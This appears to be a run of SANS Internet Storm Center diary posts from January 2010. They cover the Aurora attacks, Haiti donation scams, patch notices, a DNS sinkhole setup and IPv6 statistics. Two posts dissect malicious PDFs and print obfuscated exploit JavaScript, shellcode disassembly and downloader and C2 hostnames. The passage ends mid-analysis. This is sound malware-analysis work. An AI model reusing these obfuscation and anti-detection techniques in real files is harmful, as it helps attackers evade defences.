This led some folks (including me) to the conjecture that the attack involved the use of a malicious PDF file.  I’ve seen examples where this group used malicious PDFs, but nobody provided an example of the PDF file used in THIS attack.  Adobe’s (the company) ASSET security team released additional details yesterday (http://blogs.adobe.com/asset/2010/01/further_details_regarding_atta.html) where they assert that Adobe Acrobat Reader was not involved in the incident, that instead it was an IE vulnerability detailed here: http://siblog.mcafee.com/cto/operation-%E2%80%9Caurora%E2%80%9D-hit-google-others/

So, to recap: Adobe (the company) was attacked, but it wasn’t by leveraging an Adobe product.

So let’s look instead at how their products ARE being used to compromise systems…

The folks over at FireEye have a nice blog entry on PDF malware obfuscation and how it’s being used by the Neosploit exploit kit to distribute Mebroot: http://blog.fireeye.com/research/2010/01/pdf-obfuscation.html

Fortunately CVE-2009-4324 has been patched.

A little unsolicited feature request from Adobe for Acrobat Reader: take a gander at that little no-script add-on to Firefox.  I understand that when I download an interactive PDF-form that it’s going to need some javascript to run.  I just want to have an opportunity to click “no” when I get an unexpected PDF while browsing blogs.
 

Kevin Liston

kliston@isc.sans.org

Disclaimer: the author speaks from his experience both responding to national disasters with the American Red Cross post-9/11 pre-Katrina and as a volunteer Incident Handler.  His opinions are his own, and not those of the American Red Cross or SANS.

I have been both the “boots on the ground” and the “remote support” in a small number of national and international disasters.  I’ve been in your shoes: wanting to do something to help.  I’d like to share a bit of my experience to help you help others (and possibly yourself.)

First Rule of Disaster Response

The first rule of responding to a disaster situation is: “Don’t become a victim.”  You’re not helping the situation if you rent a truck, fill it full of donations and drive into a scene that isn’t ready to receive you.  You’ll likely run out of fuel, have no shelter, and may have to eat those canned goods that you were hoping to distribute.  Not-becoming-a-victim also applies to being aware and wary of donation-scams that will come at you from a number of channels (see other recent diary entries for current examples.)

There’s a second rule of: “Don’t try to profit from a disaster,” but the people who need to hear that aren’t reading this.

Giving 100%

Anyone that promises to pass on 100% of your donation to the “Victims of X-event” is not telling you the truth.  Either they’re consciously lying to you, or they don’t understand what they’re doing.  In either case, it’s not a good idea to give them your money.

If you donate via SMS, the telco carrier takes their cut.  If you send by PayPal, they have their fees.  If you send a check via Parcel Post, the US Postal Service charges postage.  I’m not saying that any of these organizations are greedy or guilty of violating the 2nd rule of disaster response.  I’m saying that overhead will always be present, and when an organization responsibly reports their operations overhead, that’s a good sign.

Why Earmarking is Bad

When you make a donation to an organization, resist the urge to check that “apply these funds to X-event” box.  The organization receiving your money has already invested many thousands of dollars prepping for the next disaster, and those batteries, and cell phones, bottles of water, blankets, etc. that are now being distributed wasn’t paid for out of the X-event fund.  After X-event is over, they’re going to need to replenish the supplies and gear to prepare for the next disaster.

Forcing the organization to spend money on a given operation leads to irrational spending and waste.

What’s the Good News?

I certainly don’t want to scare anyone away from reaching out to help, in fact I’d like to encourage you to donate if you can, and volunteer if you can.  There is a lot that dedicated individuals and small groups can accomplish when they're organized.

Who do You Trust?

When donating in response to a disaster in another country, it’s best to stick with well-established organizations and ideally those that already have an operating presence in the stricken area.  If you don’t know where to start I’d like to humbly suggest one of the following:
 

• CARE: http://www.care.org/
• International Red Cross:  http://www.icrc.org/
• Medecins Sans Frontieres/Doctors Without Borders: http://doctorswithoutborders.org/
   

Kevin Liston
kliston@isc.sans.org
 

Microsoft just published an advisory about a critical security vulnerability in all versions of Internet Explorer (apart from 5 – but no one has that around anymore, right?).

While all versions of Internet Explorer are affected, the risk for everyone running Internet Explorer 8 is lower since it has DEP (Data Execution Prevention) enabled by default. DEP makes exploitation of this vulnerability more difficult so as a temporary workaround you might want to enable it for older IEs (keep in mind that it might break some add-ons).

Microsoft says that so far they only saw exploits against Internet Explorer 6. In a related post (here) McAfee said that this vulnerability was (one of those) used to compromise Google. So, it appears that it was maybe even a cocktail of 0-day exploits used (IE + Adobe).

--
Bojan
INFIGO IS

The Dragon Research Group is a volunteer research organization dedicated to further understanding of online criminality and to provide actionable intelligence for the benefit of the entire Internet community.

About the distro:
The Dragon Research Group (DRG) Distro is a Linux-based Live CD platform. It forms the cornerstone of much of DRG's ongoing research, analysis and development efforts.  The goal of the DRG Distro is to build a DRG Network of pods that can securely and anonymously help provide actionable intelligence to the Internet security community.  The DRG Distro can act as a passive data collection facility for many common applications such as HTTP servers or if expressly permitted, can help actively monitor malicious Internet activity.  It also includes a number of tools that when combined with the DRG Network help provide real-time, usable intelligence to the local pod partner.

So, if you are interested in volunteering to participate in the DRG network and help provide intelligence for "better and safer Internet" visit DRG's web site at http://drg.team-cymru.org/. Details about the Distro are available at http://drg.team-cymru.org/drg-distro.html

--
Bojan

Just when you think they couldn't possibly go any lower ... The bad guys behind the Rogue AV scam (see my old diary at http://isc.sans.org/diary.html?storyid=7144 about Rogue AV) are heavily using SEO techniques to make links to their sites appear high on search engines. For example, when using Google to search for "haiti earthquake donation" top 6 hits (!) lead to compromised web sites which in turn check the referrer (they verify if you are coming from a search engine) and, if that is true, redirect you to another web site.



At the moment they are redirecting to scan-now24.com which appears to be taken down.
As posted on numerous places yesterday – if you plan on donating be very careful about sites you visit.

--
Bojan
INFIGO IS

I'm pretty sure that some of our readers had enough of malicious PDF for last couple of weeks. Adobe finally patched the last outstanding vulnerability yesterday (although the automatic installation process on my laptop horribly failed) and on the same day we had a very concerning announcement by Google.

It appears that the initial attack vector on Google (and 20+ other companies!) was probably a malicious PDF document. Judging by attack dates posted by Google (middle of December), it was maybe even the very latest vulnerability. We already posted several diaries about such malicious PDF documents last week – see my diary at http://isc.sans.org/diary.html?storyid=7867 or Daniel's static analysis diaries at http://isc.sans.org/diary.html?storyid=7903 and http://isc.sans.org/diary.html?storyid=7906 (with some of Daniel's great perl fu).

Couple of days ago we received another malicious PDF from our reader Richard. Initially we thought that it's JAOP (Just Another Obfuscated PDF), which it, at the bottom line, is, but it turned out to be much more. So, in this diary I will go through this malicious PDF document (and I promise not to bug you with PDFs any more, unless it's something really interesting). The document I analyzed has MD5 of 12aab3743c6726452eb0a91d8190a473 and the original document name was Us-J-India_strategic_dialogue.pdf.

First thing to check when analyzing such malicious documents is if they contain JavaScript. As mentioned before, Didier's PDF Tools are very handy here. Pdf-parser.py can find JavaScript automatically and in this document it was in object 6. Pdf-parser.py will display the following info for object 6:

obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/#4ce#6e#67th'), (1, ' '), (3, '2108'), (2, '/Fi#6c#74#65#72'), (2, '['),
(2, '/#46#6c#61#74#65#44ec#6f#64e'), (2, '/A#53CI#49Hex#44#65cod#65'), (2, ']'), (2, '>>'), (1, 'rn')]

 <<
   /Length 2108
   /Filter [
   /FlateDecode /ASCIIHexDecode]
 >>


obj 6 0
 Type:
 Referencing:
 Contains stream
 [(2, '<<'), (2, '/Length'), (1, ' '), (3, '1336'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>')]

 <<
   /Length 1336
   /Filter /FlateDecode
 >>

That's a bit weird – looks like there are two object 6 in the document, both first generation (trailing 0, obj 6 0). The first one looks pretty weird too – I highlighted the original filter descriptions, notice how obfuscated they are (#NN is hexadecimal ASCII value that can be interspersed with normal text in PDFs). Also, notice that the first object uses two filters: FlateDecode and ASCIIHexDecode. More about the second object below.

Now pdf-parser.py will not automatically unpack this correctly. Depending on the version of pdf-parser.py, it might even only pick the second object since Didier added support for ASCIIHexDecode later, so make sure you have the latest version of pdf-parser.py. My version prints something like this:

$ pdf-parser.py --object 6 --raw --filter Us-J-India_strategic_dialogue.pdf
obj 6 0
 Type:
 Referencing:
 Contains stream
 <</#4ce#6e#67th 2108/Fi#6c#74#65#72[/#46#6c#61#74#65#44ec#6f#64e/A#53CI#49Hex#44#65cod#65]>>


 <<
   /#4ce#6e#67th 2108
   /Fi#6c#74#65#72 [
   /#46#6c#61#74#65#44ec#6f#64e /A#53CI#49Hex#44#65cod#65]
 >>

 <</#4ce#6e#67th 2108/Fi#6c#74#65#72[/#46#6c#61#74#65#44ec#6f#64e/A#53CI#49Hex#44#65cod#65]>>
Stream
<binary blob>
Endstream

obj 6 0
 Type:
 Referencing:
 Contains stream
 <</Length 1336/Filter/FlateDecode>>

 <<
   /Length 1336

We can see that pdf-parser.py printed both objects, but only unpacked the second. In other words, we have to uncompress the first object ourselves. That's relatively easy to do – we can take the binary blob, apply deflate to it (zlib.decompress) and then just ASCII hex decode it.

After unpacking the stream we can finally see obfuscated JavaScript. It tries to exploit two vulnerabilities, util.printd and the latest doc.media.newPlayer vulnerability. In both cases it executes the supplied shell code, which contains more interesting stuff. The shell code is Unicode encoded and, by some coincidence, it even looks like Chinese characters. However, thanks to @binjo and @iamyeh from Twitter I know it's junk ?.

The shell code itself is XORed with 0x67 which makes it easy to find even if you extract it directly from the PDF document by using some of analysis techniques documented by Daniel in his diaries. However, the second stage binary is encoded differently. In order to figure that out I had to debug the shell code. After some tracing it turned out that the second stage binary is (of course) embedded in the PDF document. However, it's not XORed, as is the case typically with such embedding but instead it is RORed! The following code shows the deobfuscation part:

0040121C   > 8DB40D 0002000>LEA ESI,DWORD PTR SS:[EBP+ECX+200]
00401223   . AC             LODS BYTE PTR DS:[ESI]
00401224   . 32C1           XOR AL,CL
00401226   . C0C8 03        ROR AL,3
00401229   . 87FA           XCHG EDX,EDI
0040122B   . 8DBC0D 0002000>LEA EDI,DWORD PTR SS:[EBP+ECX+200]
00401232   . AA             STOS BYTE PTR ES:[EDI]

Why did the attacker do this? Well, maybe no special reason, but maybe he's reading our diaries and noticed how Daniel user XORSearch to find embedded binaries (maybe the AV vendors do something similar). This way he made sure that using utilities such as XORSearch will not find the embedded binary.

Besides the 2nd stage binary, there is another thing embedded in the PDF document: another PDF document (hence the diary name PDF Babushka – see this Wikipedia entry if you don't know what a Babushka is). The original shell code that gets executed by the exploit, after starting the 2nd stage binary extracts this second PDF document (which is benign) and uses Adobe Reader to display it. So, similarly to the PDF document I analyzed last week, this one shows a benign PDF document as well, but this time it directly calls Adobe to open it (that previous document dropped another binary). This also explains why pdf-parser.py sees two object 6 – the second one belongs to the second, embedded PDF document. Amazing how much garbage Adobe Reader can eat and ignore.

Back to the second stage binary. This binary is a downloader with some interesting functions. The downloader connects to hxxp://at.epac [dot] to/album/index.htm. This page looks benign, but the first line of the HTML source shows something interesting:

<!-- DOCHTMLhttp://at.epac.to/image/UPDATE.CAB -->

It's a hidden downloader command. While analyzing the downloader I noticed that it also checks for other two keywords: Tuichu and Xiumau – no idea what these are (maybe author's names/handles?).

So, finally, the UPDATE.CAB file drops another executable that injects a DLL into Internet Explorer. This DLL tries to connect to for.toh.info, on port 443 (SSL) but when I tested it the port was closed (or my IP address was filtered – I just got a RST packet back).

And this ends our journey through this malicious PDF document. Regarding AV detection, it is still far away from perfect and shows how we must not rely *only* on AV. The PDF document is detected by only 8 out of 41 AV scanners on VT (here), the second stage dropper is detected by 11/41 (here) and the downloaded UPDATE.CAB file is detected by 8/41 again (here). Sad, isn't it.

--
Bojan
INFIGO IS

This release contains fixes for 358 bugs. You can see the release notes for this version here. You can download the update here.

Note: "This feature release does not contain any new fixes for security vulnerabilities to its previous release, Java SE 6 Update 17. Users who have Java SE 6 Update 17 have the latest security fixes and do not need to upgrade to this release to be current on security fixes."

Thanks Jack for the info.

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

While we, at the ISC, do not assume that the domains being registered are malicious in nature in any way, we always take note of domains being registered near a disaster.  Simply from people parking the domains.

However, inevitably, some of these domains wind up being malicious in nature, and while we don't assume that all of them will be, it does happen, and it's unfortunate that spammers and phishers prey on people attempting to provide relief for those in need.  Especially during such a devastating disaster as this was.

As I said, we are already seeing a bunch of domains being parked in relation to the Haiti disaster, and we are going to attempt to keep an eye on them all to warn our readers of anything possibly misaligned. 

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

If you are running Adobe Reader and/or Acrobat version 9.2 and earlier, you need to patch again!

Adobe, yesterday, published their advisory, along with all the patches for this month's patch cycle.  The release (according to the patch notes) is for Adobe Reader and Acrobat <=9.2 for Windows, Macintosh, and UNIX.

They also advise that if you are running 8.1.7, that you should upgrade to the current version as well.

For the full notes, please see Adobe's webpage at: http://www.adobe.com/support/security/bulletins/apsb10-02.html

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

We all like the convenience and speed of SMS messaging. As a result, a number of companies set up services to allow donations to be send via SMS message. The approach is pretty simple. You text a message identifying your cause (e.g. "HAITI") to a special short code configured by the recipient. A "short code" is a 5 or 6 digit number configured to receive your message pretty much like a regular phone number.

These short codes are frequently advertised via twitter in messages like "SMS x to yyyyyy to donate to cause z". One thing that doesn't fit into the twitter message is that the cost of the donation will be billed to your phone bill. Typically $5 or $10. Legitimate providers of this service appear to limit you to one donation per day.

However, there is no easy way for you to identify who you send the money too. I would suggest to be very careful with this form of donation and only to use the number if you receive it from the organization directly. Please avoid sending money "blindly" just because a friend "RT" it.

Two legitimate operators of this service appear to be:

http://www.mgive.com
http://mobilegivinginsider.com

Here are some of the messages we saw on twitter in connection with the Haiti earthquake:

Text "Yele" to ***** to donate $5 4 HAITI

Text "HAITI" to "*****" & ur donation of $10 will go 2 the Red Cross 2 help w/relief efforts in #Haiti

 (I replaced the SMS number with stars)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Today a blog post was put on the Official Google Blog talking about the attack against them from China, and their responses, and possible recourses on a business side.  There are two posts, and they make for an interesting read, so be sure and check them out.

Post #1 -- http://googleblog.blogspot.com/2010/01/new-approach-to-china.html

Post #2 -- http://googleenterprise.blogspot.com/2010/01/keeping-your-data-safe.html

The hacks were a result, basically, of a technique called "targeted phishing" or "spearphishing".  One of our other handlers, Maarten, wrote an excellent diary about it last year.  Check it out here.

-- Joel Esler | http://blog.joelesler.net | http://twitter.com/joelesler

Major news organizations reported earlier about a devastating earthquake in Haiti. Unlike the smaller earthquake a few days ago off the coast of California, Internet routing isn't our biggest concern right now. We may see another wave of on-line donation scams.

During Hurricane Katrina, we saw a lot of domains being registered with domain names targeting the disaster. Since then, the pattern in these schemes changes somewhat. Instead of domain registrations, we see more paid search engine placement ads and twitter "tag" poisoning. I just took a quick look, and didn't see anything obviously illegal. Just a few valid charities advertising their services to donors via modern social media techniques and keyword purchases.

Be aware off:

Fraudulent Organizations: If possible, donate to organizations you know and trust, not to new organizations just set up for this particular event. The IRS maintains a list of tax exempt charitable organizations [1]. This list is not 100% up to date, and it takes a while for a new organization to be added. But it can serve as a first sanity check.

Malware: Malware may be advertised as a video report of the event or come under other pretenses.
 

Please let us know if you come across any scams!

[1] http://www.irs.gov/app/pub-78/

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

As soon as I wrote this diary about the missing Adobe Acrobat / Reader patch, a few readers (ours, not Adobe's ;-) ) noticed that the new version is available on Adobe's FTP server.

See: ftp://ftp.adobe.com/pub/adobe/reader/win/9.x/

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Luckily, Microsoft din't have much to announce today. But don't take the day off yet. If you run Oracle's software, you may want to take a look at the patches released earlier today [1]

Oracle patches are complex and cover far more then just the database. Among other products, this release covers the Oracle Application Server and the Oracle WebLogic Server.

[1] http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2010.html

(thanks to Juha-Matti for alerting us about the release)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

As part of today's bulletin release, Microsoft advices users of Windows XP to uninstall Flash Player 6 which is installed with Windows XP. Affected users should upgrade to the latest version or Flash Player which is available for download from Adobe.

The Adobe Flash Player was only provided with Windows XP, up to and including service pack 3. All other versions of Windows do not include Flash Player.

KB979267: http://www.microsoft.com/technet/security/advisory/979267.mspx

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

 Overview of the January 2010 Microsoft patch and status.

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

The Chinese search engine Baidu was briefly defaced earlier today. The replacement page was identical to the defacement in a recent twitter.com hack.

It appears that like in the Twitter case, the attacker did not attack the site itself, but instead changed the sites domain registration. This kind of attack is not new, but still quite successful. To defend against this attack, companies should review domain name registration policies and how credentials are handled. Changes to the registration are typically infrequent. In addition to the domain name registration itself, DNS has been tampered with by stealing credentials to admin interfaces of DNS services and internal DNS administration utilities.

It is also worthwhile to monitor DNS zones for changes by regularly polling ALL authoritative name servers.

[1] http://www.washingtonpost.com/wp-dyn/content/article/2010/01/12/AR2010011200468.html

Update: More details can be found here: http://garwarner.blogspot.com/2010/01/iranian-cyber-army-returns-target.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

I spent some time last week to analyze the IPv6 traffic isc.sans.org receives. To do so, I considered the last 90 days worth of logs. The full report can be found here.

A quick summary: IPv6 is still used by only 1.3% of hosts connecting to isc.sans.org. This is a considerable increase from about a year ago, which was about 0.5%. But the number of hits is still small. I am not able to proof this in every single case, but the overwhelming use of tunnels suggests that most if not all of these users would be able to reach isc.sans.org via IPv4. The connection speed via IPv4 would probably be faster. For myself, the latency to isc.sans.org via IPv6 is about double what it is via IPv4. Most of the overhead comes from the latency of my tunnel connection at home. The round-trip time from isc.sans.org to our tunnel broker is only 12ms.

One of the important lessons from this analysis: A large number of hosts connecting to us appears to use automatically configured tunnels like 6to4 or Teredo. These tunnels are sometimes not managed, resulting in hosts unintentionally exposed to IPv6. Many firewalls are not configured to limit IPv6 or associated tunneling protocols, or don't even have the ability to do so. These hosts may be "naked" when it comes to IPv6.

Highlights:

• We had IPv6 connections from about 13 thousand hosts.
• about 2,500 of these used 6to4 (2002::/16 addresses) and 550 used Teredo.
• only a very small fraction (815) of the IPs had PTR records configured for reverse DNS resolution.

 Full report: http://isc.sans.org/presentations/ipv6q42009.pdf (PGP Signature)

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

According to Microsoft patch tuesday preview, there will only be one bulletin released tomorrow [1].

The bulletin is only critical for Windows 2000 and considered "low" for other versions of Windows.

It does not appear that there will be a patch for the IIS file extension issue. We will have more details once the bulletin is released. Don't forget our reboot Wednesday webcast [2]!

[1] http://www.microsoft.com/technet/security/bulletin/ms10-jan.mspx
[2] http://isc.sans.org/j/webcast

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

Proof of Concept code exploiting the MacOS X 10.5/10.6 libc/strtod(3) buffer overflow CVE-2009-0689 vulnerability has been released. The list of vulnerable software includes FreeBSD 6.4 and 7.2, NetBSD 5.0, OpenBSD 4.5, Mozilla Firefox 3.0.x before 3.0.15 and 3.5.x before 3.5.4, K-Meleon 1.5.3, SeaMonkey 1.1.8, and other products, as well as MacOS X 10.5/10.6. Impact includes Denial of Service (DoS) or execution of arbitrary code. This is remotely or locally exploitable, and does not require user interaction.

From NVD:
CVSS Severity (version 2.0):
CVSS v2 Base Score:6.8 (MEDIUM) (AV:N/AC:M/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 8.6
CVSS Version 2 Metrics:
Access Vector: Network exploitable
Access Complexity: Medium
Authentication: Not required to exploit
Impact Type:Provides unauthorized access, Allows partial confidentiality, integrity, and availability violation; Allows unauthorized disclosure of information; Allows disruption of service

Cheers,
Adrien de Beaupré
Intru-shun.ca Inc.

Somehow I missed that "First Tech Credit Union" warned its users late in December about a fake Android application which pilfers user's passwords [1].

This is a somewhat expected event. Malware is frequently willingly installed by users. As users move to new platform like mobile devices, malware is going to follow them. This particular application, "Droid09" has since been removed from the Android Market Place. But it is probably just a matter of time for the next application to show up. It is probably possible for a similar application to sneak past the iTunes store approval process as well. In each case, the more managed software delivery environment limits the expose time but doesn't eliminate it.

[1] http://www.firsttechcu.com/home/security/fraud/security_fraud.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

ISC handlers have written several reports this past week dealing with malware that redirect a client to download suspicious files from sites that we often want to block. It is common for malware to use evading techniques such as fast flux to avoid being blocked by constantly changing the IP(s). However, the website name remains static and this is where DNS sinkhole comes in to play.

A way to deal with this is to resolve the address before it leaves your site to get a response from the DNS site owner. Several lists already exist on the Internet that can be used to populate a sinkhole.

The first step is to add a configuration file to the /etc/named.conf. For example, add:

include "/var/named/sink_local.conf";

Run the command "named-checkconf" to make sure you have no errors in your named.conf file.

The second step is to edit (or create it of not already done) the sink_local.conf file in the /var/named directory and add to the sinkhole the malicious site. For example, we are going to use the site published in Patrick's Diary http://isc.sans.org/diary.html?storyid=7918 our.org.molendf.co.kr. Add in sink_local.conf the following line:

zone "our.org.molendf.co.kr" IN { type master; file "/var/named/sinkhole/redirect.nowhere"; };

Third, you need to create the master file in the new sinkhole directory /var/named/sinkhole/redirect.nowhere that will redirect the client to the sinkhole address. This file never changes and remains static. I have called my file redirect.nowhere which I think is only fitting. Here is an example of this file:

$TTL    600
@                       1D IN SOA       localhost root (
                                        42              ; serial
                                        3H              ; refresh
                                        15M             ; retry
                                        1W              ; expiry
                                        1D )            ; minimum

                        1D IN NS        @
                        5 IN A          192.168.25.5

The IP address I have assigned here is an IP that can be used to alert on. For example, this IP can be a website to show a policy page. This will only work if the client is attempting to contact a website. Add  this IP (192.168.25.5) to your IDS/IPS to alert every time a PC connects to it (on any ports). The security team can verify the PC for signs of system compromise.

Last, reload your zone for your new list to take effect by executing "rndc reconfig"

Make sure the clients are now using the name server that has been configured with the sinkhole. The final step is to test the configuration to ensure the clients are resolving the malicious sites using our sinkhole address:

C:Users:guy>nslookup our.org.molendf.co.kr
Server: somename.sinkhole.com
Address: 192.168.25.25

Name: our.org.molendf.co.kr
Address: 192.168.25.5

This can be expended using other trusted list. For example, you could use the SRI "Most Observed Malware-Related DNS Names" list and add a new include option in the named.conf like sri.conf in the /var/named directory and populate with the list. This could be scripted to update daily to keep the list up-to-date. This adds another layer of defense you can control.

If you know of other lists that could populate a sinkhole, I will add them later to this diary.

Update: The Malware Domain List provides a list of website currently serving malware as well as a description (i.e. Trojan, PDF exploit, etc).

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot org

A 6.5 magnitude earthquake off the coast of California [1] is causing some local power outages at the very northern end of California [2]. This cooridor along the west coast is heavily used by various networks connecting the west coast as well as by landing points for cables from Australia and Asia.

Keynote is reporting some delays in San Diego between NTT and Verizon as well as Sprint [3]. Of course, San Diego is at the other end of the state, but it is possible that a disruption up north is effecting some connectivity leading down to San Diego.

NTT appears to use the "Trans Pacific Express" cable which lands in Oregon, about 500 Miles north of the quake [4] (probably too far to be affected)

Damage from the quake appears to be very limited. One interesting note: The quake ruptured gas lines as well as power lines. If you need natural gas for your generator, you may be out of luck.

[1] http://earthquake.usgs.gov/earthquakes/eqinthenews/2010/nc71338066/
[2] http://www.google.com/hostednews/afp/article/ALeqM5hSbG8pfMD-xv2Azo_WnqSVT_fO_Q
[3] http://www.internetpulse.net/
[4] http://www.ntt.com/aboutus_e/news/data/20091225a.html

------
Johannes B. Ullrich, Ph.D.
SANS Technology Institute
Twitter

We here at the SANS ISC always appreciate all the feedback from our readers concerning
Internet anomalies.  One such anomaly that caught my attention was a reader pointing out
some port scans that happened to target irregular Internet Protocol numbers.

While looking through my own firewall logs for similar activity, I was surprised to see a
large number of log entries involving unsolicited TCP packets that use TCP Port 6000 as
the source port.

The traffic brings back memories of the W32/Dasher worm from 2005 that had a similar
signature in its scanning (propagation) traffic where a constant TCP source port of
6000 was also used... but that was almost 5 years ago!

Has anyone had similar experiences with this type of port scanning traffic?  I welcome
your comments and feedback.

G.N. White
ISC Handler on Duty
 

Several readers have commented on today's Websense alert, found here ==> http://securitylabs.websense.com/content/Alerts/3519.aspx?cmpid=slalert

Websense discusses how, if you are on http://office.microsoft.com and use the search functions, you may receive links to sites that are not on Microsoft's domain.
This in itself is not too troubling, but the real issue is that these links are all referral links, which start with http://office.microsoft.com - so they look like they're Microsoft links (if you don't look too closely).   Clicking on links within these referred pages may then navigate away from the office.Microsoft lead url.

What Websense reports is that they've found malware, specifically "Fake Antivirus" malware  within some  of these referral links.

What makes this an issue is that, on the face of it, you might expect a web filtering application to allow these links, as they start with "office.microsoft.com".  The Websense apps figure this situation out correctly, but it is an easy thing to miss for the user driving the keyboard and mouse, and I suspect might be an easy thing to miss if you are coding a content control application.

What this highlights is that on the internet, "trust" is often misplaced.  When you search on Google, Yahoo or some other large search engine, you do not expect that all the results that you get on a search will be "safe".  But in this case of Microsoft's "captive" search function on this page, you can see how people might trust the results based on the url, especially as the search function is worded as "Search Office Online", not "Search the Internet" or "Search for the Answer"

So I guess the message of the day is, be careful who you put your "trust" in !

Surf Safe all !

We received a report from Ted of an email campaign targeting OWA users that leads to malware infections, thanks Ted!

UPDATE:  Additional information has been provided, there are changing "Subject;" lines and changing obfuscated links for users.

I personally don't have access to the full vendor bulletin, but word is out that Juniper JUNOS routers can be crashed or made to reboot with easily spoofed malformed packets. If you are using Juniper routers, make sure to log in to the Juniper support portal to read their security alert.

This sample came to us from ISC reader Joe, who reported that his Acrobat reader had crashed with the error message "A 3D parsing error has occurred". The obfuscation approach used by this sample isn't brand new, this type has been around since about mid December as far as we know. No matter, this ISC diary is not about breaking news, more about analysis technique.

$ md5sum bad.pdf
0045c97c4e9e44cac68bd85e197bfae2 bad.pdf
$ ls -al bad.pdf
-rw-r----- 1 daniel handlers 37275 2010-01-06 04:04 bad.pdf

This sample currently still stumps automated analysis tools like the usually excellent Wepawet, but this PDF is indeed malicious. Lets take a look, using Didier Stevens' pdf-parser.py as before.

$pdf-parser.py -a bad.pdf
Comment: 3
XREF: 1
Trailer: 1
StartXref: 1
Indirect object: 10
3: 7, 8, 10
/Action 1: 6
/Annot 2: 5, 9
/Catalog 1: 1
/Outlines 1: 2
/Page 1: 4
/Pages 1: 3

This document defines an "action" which triggers when the document is opened. The corresponding code is in Section 6 of this PDF. Looking at this section, we see that this is indeed a JavaScript block, but the actual code resides in section 7

$ pdf-parser.py -o 6 -f bad.pdf
obj 6 0
Type: /Action
Referencing: 7 0 R
[(2, '<<'), (2, '/Type'), (2, '/Action'), (2, '/S'), (2, '/JavaScript'), [...]

<<
/Type /Action
/S /JavaScript
/JS 7 0 R
>>

Continuing the quest, let's look at section 7:

$ pdf-parser.py -o 7 -f bad.pdf
obj 7 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '231'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 231
/Filter /FlateDecode
>>

"var z; var y; n var h = 'edvoazcl'; nt z = y = app[h.replace(/[aviezjl]/g, '')]; nt var tmp = 'syncAEEotScan'; y = 0; t z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l )
;app[h.replace(/[czomdqs]/g, '')]( s);n s = ''; z = 1;"

That's more like it! Here we actually get JavaScript code ... and this code is probably the reason why some of the automated analyzers fail: This isn't simple JavaScript, it makes use of Adobe Acrobat specific JavaScript objects and methods to refer to the currently loaded document (app.doc), to identify any "annotations" within this document (syncAnnotScan), to access the first annotation (getAnnots), to assign it to a variable, and finally to eval (run) the code within this variable.  

When we ran pdf-parser.py -a above, it showed "/Annot 2: 5, 9", indicating two annotation sections, 5 and 9. This script accesses the first annotation, thus section 5. Looking into section 5, we see that it simply refers to section 8 .. and there, finally, we find the code block

$pdf-parser.py -o 8 -f bad.pdf

obj 8 0
Type:
Referencing:
Contains stream
[(2, '<<'), (2, '/Length'), (1, ' '), (3, '8583'), (2, '/Filter'), (2, '/FlateDecode'), (2, '>>'), (1, 'rn')]

<<
/Length 8583
/Filter /FlateDecode
>>

'y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y64y64y6cy50y54y63y71y63y30y5fy43y67y28y76
y34y32y73y5fy36y34y2cy20y56y5fy5fy4ay53y33y32y29y7by76y61y72y20y71y41y69y5fy45y44y20y3
dy20y61y72y67y75y6dy65y6ey74y73y2ey63y61y6cy6cy65y65y3by76y61y72y20y54y38y5fy32y72y5
[...etc...]

Two more stages of decoding await the analyst here. First, we have to untangle the above (substitute y with %, then unescape). The resulting JavaScript code is still obfuscated:

function ddlPTcqc0_Cg(v42s_64, V__JS32){var qAi_ED = arguments.callee;var T8_2r_twoNOkI = 0;var
Fyaf2_8v_c7i = 512;qAi_ED = qAi_ED.toString();try {if (app){T8_2r_twoNOkI = 3;T8_2r_twoNOkI--;}}
catch(e) { }var ad_____M = new Array();if (v42s_64) { ad_____M = v42s_64;} else {var jVhSGHs = 0;
[...etc...]

Note how it makes use of "arguments.callee", an anti-debugging technique that we covered before. Also note how the code is again dependent on the presence of the "app" object... which is Adobe specific, and won't exist in Spidermonkey. But all you have to do to get past this stage in SpiderMonkey is to first define the app variable (set it to anything you like, app=1 works fine), and then to use your normal trick to get past the "arguments.callee" trap. I still like to use the copy of SpiderMonkey that I patched to print on every eval call.
 

Phew! Yes indeed. Considering the complexity of all this, it is probably no surprise that we are seeing such an increase of malware wrapped into PDFs ... and also no surprise that Anti-Virus tools are doing such a shoddy job at detecting these PDFs as malicious: It is darn hard. For now, AV tools tend to focus more on the outcome and try to catch the EXEs written to disk once the PDF exploit was successful. But given that more and more users no longer reboot their PC, and just basically put it into sleep mode between uses, the bad guys do not really need to strive for a persistent (on-disk) infection anymore. In-memory infection is perfectly "good enough" -  the average user certainly won't reboot his PC between leisure surfing and online banking sessions. Anti-Virus tools that miss the exploit but are hopeful to catch the EXE written to disk won't do much good anymore in the near future.
 

While we are still waiting for the patch and the malicious PDFs which exploit CVE-2009-4324 become more and more nasty, here's another quick excursion in dissecting and analyzing hostile PDF files. We'll take a closer look at the sample that fellow ISC Handler Bojan already analyzed, but will this time do a static analysis without actually running the hostile code.

$md5sum Requset.pdf
192829aa8018987d95d127086d483cfc Requset.pdf
$ls -ald Requset.pdf
